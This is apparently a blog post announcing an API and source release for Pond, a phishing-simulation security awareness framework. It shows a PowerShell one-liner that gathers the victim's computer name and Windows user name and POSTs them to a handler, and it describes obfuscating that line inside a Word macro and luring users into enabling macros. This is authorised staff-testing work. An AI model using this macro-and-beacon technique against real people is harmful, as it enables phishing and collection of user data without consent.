One of the most popular developments of mine, and in my opinion one of the most effective at what it is aimed to do, is the Pond Security Awareness Framework. In the last post I made regarding it, I had introduced the concept of mutliple campaigns and collaboration via SignalR. Multiple users could work on the same campaign, saving and resuming work on them whenever they please. My problem was, however, that the attack vector was still limited to email – I wanted more. So, I have introduced an API, meaning that any method of attack can be used where code can be executed to POST to a URL.

Further to this, the code has now – finally – been made public under the Apache license.

the api

The decision to develop an API came after watching this great talk by Ryan Barrett from BSidesSF 117:

It became clear to me that to effectively test your staff you need to simulate every possible vector that an attacker could possibly take.

The API is fairly straight forward, really. It is fed:

  • The API key.
  • Three varialbes that can be used for whatever purpose you see fit, however they will be referred to as user name, user email and user agent.

The POST data must be of the format:

{ ApiKey = “API KEY“;UserEmail = “USER EMAIL“;UserName = “USER NAME“;UserAgent = “USER AGENT“}

Providing that you are able to POST this to the ASHX handler (apiHandler.ashx) – you can record the results of vectors other than email. For example:

  • XSS watering hole attacks.
  • Modified executables offered for download.
  • Document macro’s delivered via USB stick.

One example of a test that I’ve done at work is executing obfuscated PowerShell from a Word macro, and using a bit of social engineering to dupe the victim into enabling macro’s. The document is distributed via email and USB stick.

The API key is found under the ‘Info’ tab:

The PowerShell one liner to form and POST the JSON message is as follows:

$obj = @{ ApiKey = “API KEY“;UserEmail = $env:COMPUTERNAME;UserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name;;UserAgent = “Test Name“};$json = $obj | ConvertTo-Json;Invoke-WebRequest -uri “” -Method POST -Body $json;

This script is then compressed:

the compression script is included with pond

… and inserted into a Word document macro:

Upon opening the document the user is encouraged to enable macro’s in order to view the “encrypted” document:

Which then POST’s details of the user to the Pond handler, recording a result for the action:

the source

As promised some time ago, the source for Pond would eventually be released. Well, now it can be found on GitHub.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s